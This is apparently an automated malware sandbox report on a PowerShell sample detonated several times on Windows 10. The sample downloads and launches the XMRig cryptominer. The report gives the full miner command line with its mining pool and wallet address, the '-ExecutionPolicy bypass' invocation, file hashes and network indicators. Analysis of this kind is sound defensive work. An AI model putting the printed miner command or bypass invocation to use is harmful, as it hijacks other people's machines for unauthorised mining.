memory/548-72-0x00007FF6309C0000-0x00007FF6315F3000-memory.dmp
memory/548-73-0x00007FF6309C0000-0x00007FF6315F3000-memory.dmp
memory/548-74-0x00007FF6309C0000-0x00007FF6315F3000-memory.dmp
memory/548-75-0x00007FF6309C0000-0x00007FF6315F3000-memory.dmp
memory/548-76-0x00007FF6309C0000-0x00007FF6315F3000-memory.dmp
memory/548-77-0x00007FF6309C0000-0x00007FF6315F3000-memory.dmp
memory/548-78-0x00007FF6309C0000-0x00007FF6315F3000-memory.dmp
memory/548-79-0x00007FF6309C0000-0x00007FF6315F3000-memory.dmp
memory/548-80-0x00007FF6309C0000-0x00007FF6315F3000-memory.dmp
memory/548-81-0x00007FF6309C0000-0x00007FF6315F3000-memory.dmp
memory/548-82-0x00007FF6309C0000-0x00007FF6315F3000-memory.dmp
Analysis: behavioral31
Detonation Overview
Submitted
2024-05-22 20:12
Reported
2024-05-22 20:18
Platform
win10v2004-20240508-en
Max time kernel
300s
Max time network
249s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3356 wrote to memory of 4884 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3356 wrote to memory of 4884 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| NL | 23.62.61.155:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 155.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.251.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | udp | |
| N/A | 20.42.73.24:443 | tcp |
Files
memory/3356-0-0x00007FFF98773000-0x00007FFF98775000-memory.dmp
memory/3356-1-0x0000029713B00000-0x0000029713B22000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qic2erg2.34c.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3356-11-0x00007FFF98770000-0x00007FFF99231000-memory.dmp
memory/3356-12-0x00007FFF98770000-0x00007FFF99231000-memory.dmp
memory/3356-13-0x00007FFF98770000-0x00007FFF99231000-memory.dmp
memory/3356-15-0x00007FFF98773000-0x00007FFF98775000-memory.dmp
memory/3356-16-0x00007FFF98770000-0x00007FFF99231000-memory.dmp
memory/3356-17-0x00007FFF98770000-0x00007FFF99231000-memory.dmp
memory/3356-18-0x000002972CD20000-0x000002972CD32000-memory.dmp
memory/3356-19-0x0000029713B50000-0x0000029713B5A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4884-50-0x00000145A9FE0000-0x00000145AA000000-memory.dmp
memory/4884-51-0x00000145AB7F0000-0x00000145AB810000-memory.dmp
memory/4884-52-0x00007FF7E8650000-0x00007FF7E9283000-memory.dmp
memory/4884-53-0x00007FF7E8650000-0x00007FF7E9283000-memory.dmp
memory/4884-54-0x00000145AB810000-0x00000145AB830000-memory.dmp
memory/4884-55-0x00000145AB830000-0x00000145AB850000-memory.dmp
memory/4884-56-0x00007FF7E8650000-0x00007FF7E9283000-memory.dmp
memory/3356-57-0x00007FFF98770000-0x00007FFF99231000-memory.dmp
memory/4884-58-0x00007FF7E8650000-0x00007FF7E9283000-memory.dmp
memory/4884-60-0x00000145AB830000-0x00000145AB850000-memory.dmp
memory/4884-59-0x00000145AB810000-0x00000145AB830000-memory.dmp
memory/4884-61-0x00007FF7E8650000-0x00007FF7E9283000-memory.dmp
memory/4884-62-0x00007FF7E8650000-0x00007FF7E9283000-memory.dmp
memory/4884-63-0x00007FF7E8650000-0x00007FF7E9283000-memory.dmp
memory/4884-64-0x00007FF7E8650000-0x00007FF7E9283000-memory.dmp
memory/4884-65-0x00007FF7E8650000-0x00007FF7E9283000-memory.dmp
memory/4884-66-0x00007FF7E8650000-0x00007FF7E9283000-memory.dmp
memory/4884-67-0x00007FF7E8650000-0x00007FF7E9283000-memory.dmp
memory/4884-68-0x00007FF7E8650000-0x00007FF7E9283000-memory.dmp
memory/4884-69-0x00007FF7E8650000-0x00007FF7E9283000-memory.dmp
memory/4884-70-0x00007FF7E8650000-0x00007FF7E9283000-memory.dmp
memory/4884-71-0x00007FF7E8650000-0x00007FF7E9283000-memory.dmp
memory/4884-72-0x00007FF7E8650000-0x00007FF7E9283000-memory.dmp
memory/4884-73-0x00007FF7E8650000-0x00007FF7E9283000-memory.dmp
memory/4884-74-0x00007FF7E8650000-0x00007FF7E9283000-memory.dmp
memory/4884-75-0x00007FF7E8650000-0x00007FF7E9283000-memory.dmp
memory/4884-76-0x00007FF7E8650000-0x00007FF7E9283000-memory.dmp
memory/4884-77-0x00007FF7E8650000-0x00007FF7E9283000-memory.dmp
memory/4884-78-0x00007FF7E8650000-0x00007FF7E9283000-memory.dmp
memory/4884-79-0x00007FF7E8650000-0x00007FF7E9283000-memory.dmp
memory/4884-80-0x00007FF7E8650000-0x00007FF7E9283000-memory.dmp
memory/4884-81-0x00007FF7E8650000-0x00007FF7E9283000-memory.dmp
memory/4884-82-0x00007FF7E8650000-0x00007FF7E9283000-memory.dmp
memory/4884-83-0x00007FF7E8650000-0x00007FF7E9283000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2024-05-22 20:12
Reported
2024-05-22 20:18
Platform
win10-20240404-en
Max time kernel
293s
Max time network
296s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4544 wrote to memory of 2492 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4544 wrote to memory of 2492 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
Files
memory/4544-3-0x00007FFC21F73000-0x00007FFC21F74000-memory.dmp
memory/4544-5-0x000001ED8C970000-0x000001ED8C992000-memory.dmp
memory/4544-6-0x00007FFC21F70000-0x00007FFC2295C000-memory.dmp
memory/4544-9-0x000001EDA5080000-0x000001EDA50F6000-memory.dmp
memory/4544-10-0x00007FFC21F70000-0x00007FFC2295C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0ojcfymo.sxv.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4544-25-0x00007FFC21F70000-0x00007FFC2295C000-memory.dmp
memory/4544-29-0x00007FFC21F70000-0x00007FFC2295C000-memory.dmp
memory/4544-30-0x00007FFC21F70000-0x00007FFC2295C000-memory.dmp
memory/4544-31-0x00007FFC21F70000-0x00007FFC2295C000-memory.dmp
memory/4544-51-0x000001EDA5060000-0x000001EDA5072000-memory.dmp
memory/4544-64-0x000001EDA5050000-0x000001EDA505A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2492-93-0x000001E855330000-0x000001E855350000-memory.dmp
memory/2492-94-0x00007FF639480000-0x00007FF63A0B3000-memory.dmp
memory/2492-95-0x00007FF639480000-0x00007FF63A0B3000-memory.dmp
memory/2492-96-0x00007FF639480000-0x00007FF63A0B3000-memory.dmp
memory/2492-97-0x00007FF639480000-0x00007FF63A0B3000-memory.dmp
memory/2492-98-0x00007FF639480000-0x00007FF63A0B3000-memory.dmp
memory/2492-99-0x00007FF639480000-0x00007FF63A0B3000-memory.dmp
memory/2492-100-0x00007FF639480000-0x00007FF63A0B3000-memory.dmp
memory/2492-101-0x00007FF639480000-0x00007FF63A0B3000-memory.dmp
memory/2492-102-0x00007FF639480000-0x00007FF63A0B3000-memory.dmp
memory/2492-103-0x00007FF639480000-0x00007FF63A0B3000-memory.dmp
memory/2492-104-0x00007FF639480000-0x00007FF63A0B3000-memory.dmp
memory/2492-105-0x00007FF639480000-0x00007FF63A0B3000-memory.dmp
memory/2492-106-0x00007FF639480000-0x00007FF63A0B3000-memory.dmp
memory/2492-107-0x00007FF639480000-0x00007FF63A0B3000-memory.dmp
memory/2492-108-0x00007FF639480000-0x00007FF63A0B3000-memory.dmp
memory/2492-109-0x00007FF639480000-0x00007FF63A0B3000-memory.dmp
memory/2492-110-0x00007FF639480000-0x00007FF63A0B3000-memory.dmp
memory/2492-111-0x00007FF639480000-0x00007FF63A0B3000-memory.dmp
memory/2492-112-0x00007FF639480000-0x00007FF63A0B3000-memory.dmp
memory/2492-113-0x00007FF639480000-0x00007FF63A0B3000-memory.dmp
memory/2492-114-0x00007FF639480000-0x00007FF63A0B3000-memory.dmp
memory/2492-115-0x00007FF639480000-0x00007FF63A0B3000-memory.dmp
memory/2492-116-0x00007FF639480000-0x00007FF63A0B3000-memory.dmp
memory/2492-117-0x00007FF639480000-0x00007FF63A0B3000-memory.dmp
memory/2492-118-0x00007FF639480000-0x00007FF63A0B3000-memory.dmp
memory/2492-119-0x00007FF639480000-0x00007FF63A0B3000-memory.dmp
Analysis: behavioral17
Detonation Overview
Submitted
2024-05-22 20:12
Reported
2024-05-22 20:18
Platform
win10-20240404-en
Max time kernel
291s
Max time network
298s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4488 wrote to memory of 3604 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4488 wrote to memory of 3604 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 20.231.121.79:80 | tcp | |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.179.89.13.in-addr.arpa | udp |
Files
memory/4488-0-0x00007FF957DB3000-0x00007FF957DB4000-memory.dmp
memory/4488-5-0x0000014D6FFB0000-0x0000014D6FFD2000-memory.dmp
memory/4488-8-0x00007FF957DB0000-0x00007FF95879C000-memory.dmp
memory/4488-9-0x0000014D700E0000-0x0000014D70156000-memory.dmp
memory/4488-10-0x00007FF957DB0000-0x00007FF95879C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_r5d3kgzm.fcm.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4488-25-0x00007FF957DB0000-0x00007FF95879C000-memory.dmp
memory/4488-29-0x00007FF957DB3000-0x00007FF957DB4000-memory.dmp
memory/4488-30-0x00007FF957DB0000-0x00007FF95879C000-memory.dmp
memory/4488-31-0x00007FF957DB0000-0x00007FF95879C000-memory.dmp
memory/4488-51-0x0000014D6FF50000-0x0000014D6FF62000-memory.dmp
memory/4488-64-0x0000014D6FF30000-0x0000014D6FF3A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3604-93-0x000001E6E7760000-0x000001E6E7780000-memory.dmp
memory/3604-94-0x00007FF6FABB0000-0x00007FF6FB7E3000-memory.dmp
memory/3604-95-0x00007FF6FABB0000-0x00007FF6FB7E3000-memory.dmp
memory/3604-96-0x00007FF6FABB0000-0x00007FF6FB7E3000-memory.dmp
memory/3604-97-0x00007FF6FABB0000-0x00007FF6FB7E3000-memory.dmp
memory/3604-98-0x00007FF6FABB0000-0x00007FF6FB7E3000-memory.dmp
memory/3604-99-0x00007FF6FABB0000-0x00007FF6FB7E3000-memory.dmp
memory/3604-100-0x00007FF6FABB0000-0x00007FF6FB7E3000-memory.dmp
memory/3604-101-0x00007FF6FABB0000-0x00007FF6FB7E3000-memory.dmp
memory/3604-102-0x00007FF6FABB0000-0x00007FF6FB7E3000-memory.dmp
memory/3604-103-0x00007FF6FABB0000-0x00007FF6FB7E3000-memory.dmp
memory/3604-104-0x00007FF6FABB0000-0x00007FF6FB7E3000-memory.dmp
memory/3604-105-0x00007FF6FABB0000-0x00007FF6FB7E3000-memory.dmp
memory/3604-106-0x00007FF6FABB0000-0x00007FF6FB7E3000-memory.dmp
memory/3604-107-0x00007FF6FABB0000-0x00007FF6FB7E3000-memory.dmp
memory/3604-108-0x00007FF6FABB0000-0x00007FF6FB7E3000-memory.dmp
memory/3604-109-0x00007FF6FABB0000-0x00007FF6FB7E3000-memory.dmp
memory/3604-110-0x00007FF6FABB0000-0x00007FF6FB7E3000-memory.dmp
memory/3604-111-0x00007FF6FABB0000-0x00007FF6FB7E3000-memory.dmp
memory/3604-112-0x00007FF6FABB0000-0x00007FF6FB7E3000-memory.dmp
memory/3604-113-0x00007FF6FABB0000-0x00007FF6FB7E3000-memory.dmp
memory/3604-114-0x00007FF6FABB0000-0x00007FF6FB7E3000-memory.dmp
memory/3604-115-0x00007FF6FABB0000-0x00007FF6FB7E3000-memory.dmp
memory/3604-116-0x00007FF6FABB0000-0x00007FF6FB7E3000-memory.dmp
memory/3604-117-0x00007FF6FABB0000-0x00007FF6FB7E3000-memory.dmp
memory/3604-118-0x00007FF6FABB0000-0x00007FF6FB7E3000-memory.dmp
memory/3604-119-0x00007FF6FABB0000-0x00007FF6FB7E3000-memory.dmp
Analysis: behavioral25
Detonation Overview
Submitted
2024-05-22 20:12
Reported
2024-05-22 20:18
Platform
win10-20240404-en
Max time kernel
297s
Max time network
259s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
